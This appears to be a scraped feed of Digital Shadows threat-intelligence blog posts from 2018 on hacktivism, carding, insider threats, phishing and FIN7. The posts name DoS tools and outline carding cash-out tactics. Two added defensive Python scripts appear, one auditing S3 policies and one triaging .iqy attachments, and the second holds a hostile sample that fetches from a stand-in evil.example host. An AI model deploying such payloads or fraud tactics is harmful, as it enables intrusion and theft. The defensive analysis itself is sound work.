Digital Shadows Manage Your Digital Risk Fri, 17 Aug 2018 17:44:14 +0000

Five Threats to Financial Services: Part Five, Hacktivism
Wed, 15 Aug 2018 16:08:18 +0000

OK, so it’s not as sexy as insider threats, banking trojans, phishing campaigns or payment card fraud, but hacktivism is still a threat that organizations should be concerned with. In this final post on threats to financial services, we’ll outline recent developments in the hacktivist world and focus on the threat posed by one campaign in particular: OpIcarus.


What is Hacktivism?

Hacktivism is the extension of activism into the information security sphere, using tactics like defacement, doxing and denial of service (DoS) to achieve political or ideological goals. The success of hacktivist operations varies significantly, depending on A) levels of participation and B) levels of organization.

The Anonymous collective has been the main brand of hacktivism since its emergence in 2008, but it has since splintered into smaller, regional hacktivist groups who target companies in line with regional and national geopolitical objectives. (For more on this shift, you can read our blog about the emergence of the Anonymous collective and its subsequent transformation).



Over the past two years, we have published several blogs on the various iterations of OpIcarus, a campaign first launched by Anonymous. OpIcarus began as a planned physical protest on February 8, 2016, calling for action to “shut down the banks” and disrupt the global financial system. With increased user participation, the operation gained traction across a host of online sources. The operation reached its zenith in mid-2016 (as demonstrated by Figure 1) when participants claimed to have successfully performed DoS attacks against over 60 global banks. Orchestrating their attacks through social media and Internet Relay Chat (IRC) groups, OpIcarus encouraged users to use the Low Orbit Ion Cannon (LOIC), a popular tool for performing DoS attacks. Participants freely shared tools and techniques on these channels, hoping to co-opt more supporters for their campaign and, in turn, amplify the potency and impact of their attacks.

Figure 1: Mentions of “OpIcarus” across blogs, criminal forums, paste sites and dark web pages between 2016 and August 2018

While OpIcarus no longer attracts the attention it did in 2016, it should not be discounted. This month, we’ve observed the “doxing” of a VIP of a global bank as part of the 2018 wave of OpIcarus attacks. Furthermore, at the end of May 2018 the online and mobile banking services of Rabobank were taken offline for several hours following a Distributed Denial of Service attack (DDoS). Shortly after this announcement, a post on Pastebin claimed responsibility for the attack as part of OpIcarus. The post also referred to 57 other global banks designated as OpIcarus targets, as well as advice on which tools to use. Unlike in 2016 when LOIC was recommended, individuals are now advised to steer clear of the tool, instead preferring other DoS or “Stresser” services such as “xerxes”, “Slowloris”, and “Ufonet” (see Figure 2). For financial institutions – particularly those named on the OpIcarus target list – this shift in tooling is significant for understanding the threat level posed by the campaign and what defensive measures should be implemented to ward off DDoS attacks.

Figure 2: A post claiming responsibility for the Rabobank DoS attack on May 24, 2018

In this Pastebin post claiming responsibility for the Rabobank attack, the author includes the OpIcarus hashtag along with references to other hacktivist operations, including OpPayback, a campaign focused on the Netherlands. This tagging of attack claims under multiple operational banners is common within the hacktivist community. With Anonymous devolving into smaller, more regional groups and operations, hacktivist actors will often use hashtags from large, well-known operations to solicit support for their attacks and objectives.

These operations are no longer centrally coordinated by an influential core of hacktivists who decide on suitable targets, timing of attacks and overall campaign objectives. Whereas OpIcarus began with global aims to shut down the financial system, in 2018 it is more commonly used in regional operations with narrower and more localized ambitions – in this case being specifically targeted at financial institutions in the Netherlands and aligned with OpPayback. Similarly, a version of OpIcarus, OpIcarusNi, seeks to apply the operation to Nicaragua in the wake of recent political and economic tensions in the country. With this decentralization, it’s unlikely that OpIcarus will garner the levels of support and orchestration seen in its 2016 heyday.

Figure 3: Pastebin posts referencing “OpIcarus” in the past 12 months


The Future of OpIcarus: Down but not Out

It’s clear that OpIcarus has changed considerably since its emergence in 2016. The 2018 operation is often performed in tandem with local hacktivist operations, with participants encouraging the use of different DoS and stresser tool sets. Despite a perceived decline in threat level and a shift to a more regional approach, the successful Rabobank DDoS attacks demonstrate that hacktivism still poses a threat to banks across the world. Today, OpIcarus attacks are far more sporadic and unpredictable given the loss of centralized command by the Anonymous collective.

To stay ahead of the threat, financial institutions should begin tracking the online activity of local and regional hacktivist actors in the event that they perform attacks under the OpIcarus banner; it’s no longer sufficient to rely on announcements from the most influential global Anonymous social media accounts, as attack claims are often performed by lesser-known Anonymous offshoots. This includes monitoring paste sites and social media for mentions of their domains and IP addresses, while following developments in hacktivist tooling to ensure DDoS defenses are up-to-date and appropriate.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Five Threats to Financial Services: Part Four, Payment Card Fraud
Tue, 14 Aug 2018 18:04:02 +0000

Payment card information is the lifeblood of the cybercriminal ecosystem. In previous blogs in this series, we’ve focused on how cybercriminals acquire customer banking information using banking trojans and phishing campaigns. However, this merely represents the initial steps that form one part of a wider payment card fraud network. This post focuses on the three steps fraudsters turn to in order to monetize these stolen payment cards. Banks can learn from these steps to inform their own defenses.

How Cybercriminals Use Stolen Payment Cards

Step 1: Learn the latest techniques

As fraud defenses evolve, cybercriminals similarly adapt their tactics to avoid detection and increase their fraud success rate. One such example is the emergence of the Genesis Market, an online marketplace that provides a way to imitate the browser of a victim in a bid to evade fraud solutions. Genesis (shown in Figure 1) has been in development for several years and is currently in Beta mode, but has gained positive reviews across carding forums over the past few months.

Figure 1: A screenshot from the Genesis market

There are many ways fraudsters can learn about the latest trends and gain tips for conducting their activities. Last year we published a whitepaper, Inside Online Carding Courses, on a professional e-learning carding course, complete with webinars, instructors and reading material. The increased professionalization and sophistication of this fraud has negative implications for credit card companies, merchants, and consumers. The course, which costs attendees $1000, included modules advising the best cards to target and which geographies to focus on. By studying these courses, banks can gain an understanding of the extent to which their customers are popular targets for fraudsters.

Figure 2: A translation of the advertised online learning course for carders


Step 2: Buy payment cards from a reputable site

While it’s possible that cybercriminals who harvest payment card information commit fraud themselves, it’s more common for them to sell this data in bulk to a distributor. Online credit card shops, also known as Automated Vending Carts (AVCs), play a crucial role in selling stolen payment cards. These shops buy bulk sets of payment cards and sell them on piecemeal to would-be fraudsters. AVCs have vast numbers of payment cards for sale, with those issued in the United States by far the most popular (Figure 3).

Figure 3: Cards for sale on C-v-v[.]su

Most AVCs provide a “checker”, an automated feature that checks whether a card is still active and determines its balance. For those purchasing cards on a site that lacks payment card validation, another option is to have the cards checked in an Internet Relay Chat (IRC) room for a nominal fee of $0.15. This serves as a reminder that criminals do not need to cash out to make money from carding – there’s plenty to be made from support services too. Banks can monitor for mentions of their Bank Identification Numbers (BINs) to detect the early stages of fraud.

This industry attracts the ire of law enforcement and there have been some notable arrests and seizures. AlphaBay, a dark web marketplace that had its own automated credit card shop, was seized over a year ago. Shortly after, members associated with the Infraud Forum were indicted. Most recently, on August 1st, 2018, the US Department of Justice filed criminal charges against three men reported to be associated with the organized criminal group known as FIN7. Despite these clear successes, it would be naïve for us to assume that this spells the end for AVCs.


Step 3: Commit payment card fraud and cash out

With the latest techniques learned and valid payment cards purchased, the final stage is to “cash out” and monetize this data with one of three main tactics:

  1. Direct Purchase of Goods. Fraudsters use sites that are cardable (susceptible to fraudulent purchases as a result of lax security controls) in order to make fraudulent purchases with stolen payment card information. Criminals collaborate and share lists of cardable sites that individuals can turn to that allow goods to be purchased with stolen payment cards. The carder will then purchase goods and resell them for a reduced price in order to receive clean money.
  2. Agent Fraud. A carder impersonates a hotel or airline agent, makes a reservation in the cardholder’s name, waits for the card to authorize, and then changes the reservation name. Social engineering is central to this approach.
  3. Drops and Middlemen. As demonstrated by FIN7, cybercriminals register fake companies that search for unemployed and vulnerable people to take seemingly legitimate jobs as a “Merchandising Manager” or similar. This job involves reshipping fraudulently purchased goods and counterfeit money to safe addresses. Just as with agent fraud, social engineering is key. The websites must look convincing in order to sway the individual to work for the bogus company. It is also a reminder that just because a website uses HTTPS does not mean it is legitimate.

Fighting Payment Card Fraud: En Carde

Cashing out is the final stage within a vast payment card ecosystem. Often criminals will target retailers’ websites to monetize this information, but there are plenty of steps banks can take to detect this fraud and the different stages of the fraud lifecycle. There are three ways banks may gain visibility into payment card fraud:

  1. Benchmark yourself against peers. Understand which card providers fraudsters recommend not using and use this to understand where your company stacks up.
  2. Monitor IRC checking channels. Monitor these channels for Bank Identification Numbers (BINs) and Issuer Identification Numbers (IINs) that are indicative of a criminal testing an individual’s card.
  3. Monitor AVC shops for BINs and IINs. Monitor for BINs and IINs that are offered for sale. In many cases, it is possible to free-text search and filter by BIN.

With billions of dollars lost to payment card fraud each year, these steps can help to reduce fraud against your organization. You can read more about cashing out in our whitepaper, Inside Online Carding Courses.

In the final blog of the series, we’ll look into the threat of hacktivism for the financial services industry.



ShadowTalk Update – 08.13.2018
Mon, 13 Aug 2018 16:07:30 +0000

In this week’s ShadowTalk it’s all things phishing. Rose Bernard and Simon Hall join Rafael Amado to discuss the recent arrest of three alleged members of the FIN7 organized criminal group. The team look over the United States Department of Justice’s indictment, focusing on how FIN7 use social engineering and sophisticated phishing to great effect, before talking more generally about the threats of business email compromise and malspam.


New tweets weaken credibility of extortionists thedarkoverlord

The thedarkoverlord (TDO) threat group claimed to have exfiltrated sensitive data from five more companies since its last claim in April 2018. Although the extortionists continue to focus on the healthcare sector, the additional claims include attacks on a tax company and a high-profile United States law firm. TDO’s credibility as a threat group has been based largely upon previous leaks that were confirmed as genuine; however, the group has enacted only three data leaks since September 2017, and the leaked data is currently unavailable, preventing independent verification. Therefore, TDO’s threat profile has changed since 2017 and, although its members will likely continue tweeting claims of data exfiltration in the next two to four weeks, their claims may not be legitimate.


MikroTik routers infected in cryptomining attacks 

Security researchers identified a cryptomining campaign exploiting vulnerable MikroTik network routers in Brazil. Initially the infected routers injected the Coinhive cryptominer script into the code of all Web pages visited through the router. After researchers identified this tactic, the campaign injected the script only into the code of error pages. One Coinhive key was used, indicating that one threat actor was responsible. Companies using MikroTik devices should prioritize patching to mitigate against the campaign.


Semiconductor maker hit by WannaCry ransomware, shuts down systems

The chip manufacturer Taiwan Semiconductor Manufacturing Company (TSMC) was forced to shut down some of its systems due to malware, which was later confirmed to be WannaCry ransomware. TSMC stated that the infection was not the result of a direct attack. Allegedly the malware was introduced via a download during a routine software update from a presumably compromised third-party supplier. No technical indicators were provided to independently confirm whether this was the variant of WannaCry responsible for global infections in May 2017; regardless, the incident demonstrates the importance of running all software downloads through anti-virus solutions before introducing them to a system, even those from trusted suppliers.


US healthcare provider victim of business email compromise

The United States healthcare provider UnityPoint Health reported that it had been the victim of a phishing attack that allowed access to internal networks between March 14 and April 3, 2018. Despite the company’s claim that attackers had sought access to vendor-payment or payroll systems, the personally identifiable information of approximately 1.4 million patients was compromised in the attack.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Digital Shadows Contributes to Insider Threat Research
Thu, 09 Aug 2018 15:08:29 +0000

On July 30, Forrester published its latest research report on malicious insiders, Defend Your Data As Insiders Monetize Their Access. With research content provided by Digital Shadows, the report details how insiders with valuable data or privileged access are using online forums and marketplaces to find buyers. At the same time, cybercriminals are using these same platforms to actively recruit insiders from a variety of industries. As many of these criminal forums are located on the clear web, it’s a reminder that we shouldn’t hyper-focus on dark web sources alone.


Risks to financial services, retail and healthcare

One of the findings in Forrester’s report is that organizations in the financial services, retail and healthcare industries have some of the highest risk when it comes to malicious insiders. With organizations in these industries handling so much sensitive customer data (think personally identifiable information (PII), health records and payment card details), this is hardly a surprise.

In one of our previous blogs, Five Threats to Financial Services: Part One, Insiders, we looked in greater depth at some of the issues financial services organizations should consider when monitoring for insiders, including cybercriminals on the lookout for accomplices with access to SWIFT banking systems, and the emergence of dedicated sites for individuals looking to sell insider trading information.


Telecommunications insiders and SIM-swapping

While the above industries are extremely valuable from an insider perspective, Forrester also stresses that any number of industries dealing with sensitive intellectual property or customer data can be susceptible to this threat. These include manufacturing, technology and telecommunications.


Figure 1: User on a Russian-language forum requesting healthcare insiders (Translation: “Looking for doctors heading hospital departments or directors of private clinics”)


For the telecommunications industry specifically, there is a demand for insiders who can facilitate SIM-swapping or SIM-hijacking attacks. SIM swapping abuses a legitimate process that millions of people go through every year when transferring a phone number to a new SIM or mobile network. Here an attacker will typically contact a target’s network provider and use social engineering techniques to convince network support staff to switch calls and texts to a new SIM that the attacker controls. From there they can bypass SMS-based two-factor authentication, such as that used to protect online banking accounts.

In the criminal forum post below (Figure 2), a user claimed to have multiple workers operating at three large UK network providers who were able to perform SIM swaps.

Figure 2: Criminal forum user offering SIM swapping services (Screenshot taken from Digital Shadows platform)


Don’t forget the accidental insider

One area that was out of the scope of the insider report, but should nonetheless be high on the radar of all organizations, is the risk associated with accidental insiders. Unlike cognizant and malicious individuals looking to peddle their privileged access or sensitive company information, an accidental insider is instead an employee who has unwittingly compromised their organization through poor security practices. In many of the examples of sensitive exposure that we see, it’s the case of innocent staff leaving sensitive systems exposed to the public Internet, misconfiguring their devices, or sending highly confidential data to unsecured locations in the cloud.

Our previous whitepaper, Too Much Information, demonstrated how employees, contractors and third parties are often responsible for some of the most serious security breaches by misconfiguring network file sharing services and storage solutions such as Amazon S3 and Network Attached Storage (NAS) drives. A prime case is that of the contractor performing penetration tests. In the example below (Figure 3), a penetration testing company uploaded a lengthy report detailing all of an organization’s outdated servers, missing patches and network infrastructure. Why go to all of the trouble of recruiting and paying a company insider, along with the risk of exposure that entails, when sensitive company secrets are freely available online?


Figure 3: Screenshot of penetration test report contents page exposed through misconfigured file sharing service


Likewise, in our latest joint research paper, ERP Applications Under Fire, we found examples where employees and third parties had left full login credentials for critical Enterprise Resource Planning applications on public Trello boards, a cloud-based project management tool.

Figure 4: ERP credentials left exposed on open Trello board


Securing your organization from accidental insiders

Preventing breaches and exposure through accidental insiders requires a mixture of technology, process and training. For organizations looking to minimize this threat, consider the following:

  1. Provide security awareness training for all staff, including contractors and third parties. This should also cover the risks of using home NAS drives for company data and archiving files using file sharing services.
  2. If employees and contractors need to use NAS devices, then users should add a password and disable guest/anonymous access, as well as opt for NAS devices that are secured by default. If possible, you should look to offer backup solutions so that contractors and employees don’t feel the need to back up their devices at home.
  3. Ensure two-factor authentication (2FA) is enabled across the organization where possible. This will help prevent unintentionally leaked credentials being leveraged by malicious actors.
  4. Restrict access to important data to only those who are required to have it. Read/write access should only be granted where there is an explicit business requirement.
  5. Monitor your external footprint for cases of accidental data loss and exposure. Document Loss Prevention solutions can help identify cases where sensitive information has left your estate.
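The earlier point about Amazon S3 misconfiguration and item 4 above (grant read/write access only where there is an explicit business requirement) can be turned into a concrete check. Below is an added example, not code from Digital Shadows or Forrester, that parses an S3 bucket policy document and lists every Allow statement granted to a wildcard principal, i.e. to anyone on the Internet. Both policy documents are constructed: the bucket name, the account id 123456789012 and the SecurityTeam role are placeholders, and the first policy is the weak setting with the second as its corrected form.

```python
"""Added example (not Digital Shadows code): find statements in an S3 bucket
policy that grant access to anyone. Both policy documents are constructed."""
from __future__ import annotations

import json

# Weak setting: an accidental insider wanted a contractor to fetch the
# pentest report and granted GetObject/ListBucket to Principal "*".
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-pentest-reports",
                      "arn:aws:s3:::example-pentest-reports/*"]},
        {"Sid": "TeamWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/SecurityTeam"},
         "Action": "s3:PutObject",
         "Resource": "arn:aws:s3:::example-pentest-reports/*"},
    ],
})

# Corrected form: access only for the named role, plus a Deny that refuses
# unencrypted transport. The Deny is addressed to "*" but grants nothing.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "TeamReadWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/SecurityTeam"},
         "Action": ["s3:GetObject", "s3:PutObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-pentest-reports",
                      "arn:aws:s3:::example-pentest-reports/*"]},
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*",
         "Resource": ["arn:aws:s3:::example-pentest-reports",
                      "arn:aws:s3:::example-pentest-reports/*"],
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
})


def _as_list(value) -> list:
    """Policy fields such as Statement, Action and AWS may be a scalar or a list."""
    return value if isinstance(value, list) else [value]


def is_wildcard_principal(principal) -> bool:
    """True for Principal "*" or for any principal type mapped to "*"
    (for example {"AWS": "*"} or {"AWS": ["arn:...:root", "*"]})."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(vals) for vals in principal.values())
    return False


def public_grants(policy_json: str) -> list[dict]:
    """Return one finding per Allow statement addressed to everyone.
    A conditioned grant (e.g. limited to a VPC endpoint) is still reported,
    flagged so a reviewer can decide whether the condition is tight enough.
    Statements using NotPrincipal are not interpreted here and need manual review."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue  # a Deny to "*" is a guard rail, not a public grant
        if not is_wildcard_principal(stmt.get("Principal")):
            continue
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "actions": _as_list(stmt.get("Action", [])),
            "conditional": "Condition" in stmt,
        })
    return findings


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, public_grants(doc))
```

Running the check over a policy pulled with the AWS CLI (`aws s3api get-bucket-policy`) is a cheap way to catch the "share it with the contractor" shortcut before a report like the one in Figure 3 ends up indexed; bucket ACLs are a separate grant path and would need their own check.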
Five Threats to Financial Services: Phishing Campaigns
Wed, 08 Aug 2018 16:00:38 +0000

In our last blog, we highlighted how banking trojans are a threat to banking customers and small businesses, normally delivered via phishing emails containing malicious attachments. While phishing is a threat to businesses and individuals in all industries, attackers targeting financial services organizations often use highly-crafted social engineering tactics to make sure they hit their mark. In the third blog of the series, we’ll take a deeper look into the techniques used to phish financial organizations, as well as ways in which you can mitigate these attacks.


What is phishing?

Phishing is a tactic where the attacker poses as a legitimate individual or service to gather sensitive information such as credentials or payment card information, or to install malware on the target’s device. This is usually achieved either with an email containing a malicious attachment, or with a link that redirects the victim to a malicious domain where they will be asked to provide sensitive information or install plug-ins.

Email phishing campaigns can be wide and indiscriminate in their targeting, hoping that recipients will not recognise the fraudulent nature of the email. In many cases these emails are used to deliver malware such as banking trojans.


What is Spear Phishing?

Spear phishing is a form of phishing that targets a specific individual or organization. Frequently, the emails are tailored to the recipient to make them more believable. Two common types of spear phishing are:

  • Business Email Compromise (BEC). There are many different versions of BEC, but in one popular method the attacker will either spoof an executive’s email address and impersonate them, or even use a compromised business email account, to get an employee, customer or supplier to transfer funds or sensitive information to the phisher.
  • Whale phishing (or Whaling). A form of BEC in which high-level executives are the target. Attackers can use information about the executive found in public sources, including their name, phone number, email, or professional address, when selecting targets and developing social engineering tactics.

Phishing Financial Organizations

Knowing your target

An attacker will often spend considerable time investigating their target, so they can tailor the email to them and make it as compelling as possible. In recent years we’ve seen threat groups specializing in specific industries and geographies, resulting in a high level of sophistication in their attacks.

Let’s take the example of the Carbanak malware, which has been associated with several different campaigns against financial institutions, retail businesses, ATM systems and point-of-sale service providers. As the malware is in public circulation, it has been attributed to more than one group, including both the Carbanak group and FIN7. It’s unclear whether these groups are associated or simply share use of the malware and similar tools.

Operators of the Carbanak malware use social engineering techniques such as spear phishing in combination with malicious attachments containing the malware. When targeting financial companies, the emails are tailored to employees, appearing to have been written by native English speakers familiar with both investment terminology and the inner workings of public companies (see Figure 1 below). The emails frequently play up shareholder and public disclosure concerns.

Figure 1: Example of FIN7 phishing email (Source: FireEye)


Digital Shadows recently discovered files and source code that were allegedly related to the Carbanak group. Whatever the actual provenance of the leaked source code and files, these findings provided significant insights on how criminal groups target financial organizations with a level of sophistication that displays a strong understanding of the industry. The files not only contained the malware used to target the organizations, but also included detailed information on banking systems, instructions on how to make fraudulent payments and bypass anti-fraud features, and a list of key personnel responsible for payment processing in each of the target banks.

But how can attackers collect the information needed to learn about their targets and make their emails more believable? An open source investigation can provide a lot of information during the reconnaissance phase of the attack. An attacker will try to find any social media accounts pertaining to their victim(s), credentials found in past breaches, email and phone numbers in company material, personal addresses and emails linked to possible domains registered under the individual or provided in public company registries and assets under their name. The most sophisticated attackers, such as the Carbanak group, will often have contacts or insiders within financial organizations who can provide them with more specialized information or even privileged access to perform their operations.


Low barriers to entry

A lack of technical background or unfamiliarity with financial services terminology is not a hindrance to someone who wants to perform a phishing attack. If the attacker only cares about harvesting credentials and credit card information from opportunistic targets, ‘finesse’ and technical capability are not a primary requirement. In many criminal marketplaces, aspiring attackers can find listings for complete phishing pages, usually clones of known organizations, that anyone can buy along with instructions on how to use them (See Figures 2 and 3).

Figure 2: Listing offering phishing pages for sale (Source: n0va[.]shop)


Figure 3: Tutorial on how to create a phishing page (Source: xplace[.]com)


Business Email Compromise

During a BEC, the attacker will impersonate a company executive and attempt to get an employee, customer or supplier to transfer funds or sensitive information to the phisher. A 2017 advisory from the Federal Bureau of Investigation’s (FBI) Internet Crime Complaint Center (IC3) reported that BEC attacks between October 2013 and December 2016 caused worldwide losses totalling over $5 billion. Recently, a six-month coordinated global law enforcement effort under the name “Operation Wire Wire” targeted business email compromise schemes, which resulted in 74 arrests.

Two highly publicized BEC attacks that hit the news in recent years are those that targeted Xoom and Scoular. Both are financial companies where spoofed emails were sent to their employees, resulting in transfers of millions of dollars to third party accounts. In Xoom’s case the emails targeted their finance department, while in Scoular’s the emails impersonated the company CEO. In some scenarios, if the attacker is familiar with the organization and its processes, they could also take advantage of real life events such as tax deadlines or impending financial deals to make their phishing attempt more believable.


Mitigating phishing attacks

Standard countermeasures such as anti-spam filters and anti-malware protections will usually filter out some of these scam emails; however, they are not fool-proof, especially against the most targeted attacks such as spear phishing and whaling. Organizations should therefore look to adopt a broader approach, which can include:

  • Educating your team. Organizations should invest heavily in educating their personnel about these types of attacks and how to recognise them. Update your security awareness training content to include the BEC scenario. This should be a part of new hire training, but you should conduct ad-hoc training for this scenario as well. Additionally, employees should only have access to the infrastructure and resources appropriate for their position and level; that way, even if they are compromised, the attacker will be limited to that part of the company network. Two-factor authentication should also be required as part of the company’s security policy.
  • Updating your incident response strategy. You need to build BEC into your contingency plans, just as you have built ransomware and destructive malware into your incident response/business continuity planning.
  • Introducing continuous monitoring. Conduct ongoing assessments of your executives’ digital footprints. You can start by using Google Alerts to track new web content related to them.
  • Enhancing company policies around wire transfers. Work with your wire transfer application vendors to build in multiple person authorizations to approve significant wire transfers and prevent successful BEC attempts against your organization.
  • Establishing an OPSEC Program. Formalize an Operations Security (OPSEC) program. Organizations and their employees often, unknowingly, expose detailed personal information or information about the systems and third parties they use on social media and other sources. In the wrong hands, this information can be used effectively to socially engineer a target.


In our next blog of the threats to financial services series, we’ll cover everything you need to know about payment card fraud. Stay tuned.


ShadowTalk Update – 08.06.2018
Mon, 06 Aug 2018 15:29:50 +0000

In this week’s episode, JP Perez-Etchegoyen, CTO of Onapsis, joins Michael Marriott to talk about the exposure of SAP and Oracle applications, the increase in publicly-available exploits, and the threat actors we have observed targeting the sensitive data held within these applications. Download the full report, ERP Applications Under Fire, to learn more.



Kronos or Osiris: both gods spell trouble for banking customers

The once-prolific banking trojan Kronos has resurfaced in three active campaigns, each using different infection techniques and targeting different geographies. This revived activity coincides with an advertisement on criminal forums for a trojan called Osiris, which has similarities to Kronos and is referenced in one of the campaigns. This could indicate an attempt to rebrand the trojan. Read our recent blog on banking trojans to find out more.

Multi-tiered supply-chain attack identified

Unidentified threat actors successfully targeted “the supply-chain of a supply-chain” to distribute cryptocurrency miner malware. A software vendor hosting additional packages for a PDF editing application was compromised, effectively turning the app’s installer into a malware distributor. The campaign’s overall impact was low, as only a small number of users were impacted. However, this attack method was sophisticated and highlights the increasing risks posed by supply-chain attacks.


Thedarkoverlord returns to target Florida healthcare facility

Extortion threat actor(s) thedarkoverlord posted a link on their Twitter account to a downloadable folder containing potentially sensitive healthcare information. The data had allegedly been sourced from a doctor in Florida, United States, and was likely published after a failed extortion attempt. This latest attack is consistent with thedarkoverlord’s previous targeting of the healthcare sector and use of sensitive data for extortion purposes, meaning such tactics may continue.


Middle East remains a target for cyber espionage activities

The threat group “DarkHydrus” targeted government entities in the Middle East with a custom PowerShell backdoor. The group sent spearphishing emails carrying Excel Web Query (.iqy) files: plain-text files containing a URL that Excel fetches automatically when the file is opened. The Necurs botnet recently abused the same file type in a campaign delivering a remote access trojan. DarkHydrus has been active since early 2016 and originally repurposed legitimate open-source tools for malicious ends; its custom backdoor “RogueRobin” was potentially pieced together from code in those tools.
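An .iqy file is small enough to parse and triage at the mail gateway rather than relying on extension blocking alone. The following is an added example written for this post, not code from the original article, from DarkHydrus research or from any vendor: it parses the documented .iqy layout (a WEB type line, a version line, the URL, then optional key=value lines) and blocks any file that would make Excel reach out to a host outside an assumed internal allowlist. The sample attachments and the INTERNAL_HOSTS set are constructed for illustration.

```python
"""Triage Excel Web Query (.iqy) attachments.

Added example for this blog post; not code from the original article or
from any vendor. Sample attachments are constructed inline. The format
handling follows the .iqy layout Excel uses (a 'WEB' type line, a version
line, the URL, then optional key=value lines); the INTERNAL_HOSTS allowlist
is an assumption for illustration."""
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Assumed: hosts an organisation has deliberately published web queries from.
INTERNAL_HOSTS = {"intranet.example.local", "reports.example.local"}


@dataclass
class WebQuery:
    url: str
    version: str
    params: dict = field(default_factory=dict)


def parse_iqy(data: bytes) -> WebQuery:
    """Parse raw .iqy bytes; raises ValueError if it is not a WEB query."""
    text = data.decode("utf-8-sig", errors="replace")  # utf-8-sig drops a BOM
    lines = [ln.strip() for ln in text.splitlines()]
    lines = [ln for ln in lines if ln]  # blank separator lines are permitted
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    params = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            params[key.strip()] = value.strip()
    return WebQuery(url=lines[2], version=lines[1], params=params)


def assess(data: bytes) -> dict:
    """Return a verdict dict: 'allow', 'block' (with reasons) or 'reject'."""
    try:
        query = parse_iqy(data)
    except ValueError as exc:
        return {"verdict": "reject", "reason": str(exc)}
    parsed = urlparse(query.url)
    host = (parsed.hostname or "").lower()
    reasons = []
    if parsed.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {parsed.scheme!r}")
    if host not in INTERNAL_HOSTS:
        reasons.append(f"external host {host!r}")
    if parsed.scheme == "http":
        reasons.append("cleartext http fetch")
    return {"verdict": "block" if reasons else "allow",
            "url": query.url, "reasons": reasons}


# Constructed samples: an attacker-style query and a benign internal one.
SUSPICIOUS_IQY = b"WEB\r\n1\r\nhttp://evil.example/r.txt\r\n"
BENIGN_IQY = (b"\xef\xbb\xbfWEB\n1\nhttps://reports.example.local/q.asp\n\n"
              b"Selection=AllTables\n")

if __name__ == "__main__":
    for sample in (SUSPICIOUS_IQY, BENIGN_IQY, b"not an iqy"):
        print(assess(sample))
```

Note that Excel only prompts the user once, to enable the data connection; everything after that is the remote server's choice, so the decision point is the gateway, not the user.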



To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

FIN7: Arrests and Developments Thu, 02 Aug 2018 16:26:38 +0000 Three alleged members of FIN7 arrested

On August 1st, 2018, the US Department of Justice filed criminal charges against three men reported to be associated with the organized criminal group known as FIN7. The indictment states that FIN7:

  • Targeted 3,600 business locations across the United States, United Kingdom, Australia, and France. This included companies in 47 US states.
  • Compromised 6,500 individual point-of-sale terminals.
  • Stole more than 15 million customer card records.


What is FIN7?

FIN7 is a cybercriminal group that has primarily focused on acquiring payment card information. There has been a little confusion surrounding the naming of this group, conflating FIN7 with both the Carbanak group and the Jokers Stash online credit card store. To add further confusion, the Carbanak group – whose alleged “kingpin” was arrested on 26 March 2018 – also shares its name with the CARBANAK malware, which is used to infiltrate financial institutions and steal funds from the target organization. The malware, however, has been in public circulation since September 2015, meaning that it is in the hands of multiple cybercriminals and groups. FIN7 has used an adapted version of the CARBANAK malware to facilitate the theft of card records, leading to the unconfirmed association between FIN7 and the Carbanak group.

Joker’s Stash refers to an infamous online card shop (which we have discussed in a previous blog on blockchain DNS). While the indictment states that many of the cards stolen by FIN7 have been sold on Joker’s Stash, this is just one of many online card shops available to cybercriminals selling payment card information and should not be considered synonymous with FIN7.

The DOJ’s indictment contains several documents outlining the charges against the three individuals as well as an overview of how FIN7 attacked organizations and stole data. In this blog we’ll provide some key observations on FIN7’s operations and on what these developments will mean to the future of payment card fraud.


1.    Sophisticated phishing and social engineering are the cornerstones of FIN7’s success

As we see time and time again, the most effective technique for delivering malware and performing network intrusions is phishing, and FIN7 is no different. By sending emails from addresses like “”, FIN7 members convinced victims to open a malicious Word document; an example provided as part of the indictment is shown in Figure 1. To add further legitimacy, the email was often accompanied by a phone call to the target business, in which the caller would goad the victim into opening the attachment and so executing the malware.


Figure 1: An email provided as part of the DOJ indictment:


2.    Shell company established

The indictment states that a shell company, Combi Security, was established “to provide a guise of legitimacy and to recruit hackers to join the criminal enterprise”. Although the site is no longer accessible, there are numerous references to combisecurity[.]com online, showing how FIN7 used a combination of online forums and legitimate job sites to recruit their members. However, it should be noted that many members were likely unaware of the true nature of the shell company.


Figure 2: A screenshot of the combisecurity[.]com site, by a user claiming to have designed their website


Figure 3: A job advert from November 2015 on the Superjob site


Figure 4: A forum post from June 2016 looking for a System Administrator for Combi Security

3.    The online market for payment cards is alive and healthy

The indictment stated that many of the card records were sold on Joker’s Stash. Although there are likely to be many more members of FIN7, the arrests of these three individuals may result in reduced traffic through this site.

Indeed, this follows on from a string of notable arrests in 2018. Back in February 2018, the Department of Justice unveiled another indictment against 36 individuals associated with the Infraud Forum, a cybercriminal forum specializing in payment card fraud.

While these will all be significant blows to the flow of stolen payment cards online, plenty of shops remain. On just one site, c-v-v[.]su, there are over 1.2 million cards for sale, over 400,000 of which have CVVs associated.


Figure 5: Cards for sale on C-v-v[.]su



4.    United States the most popular geography for stolen payment cards

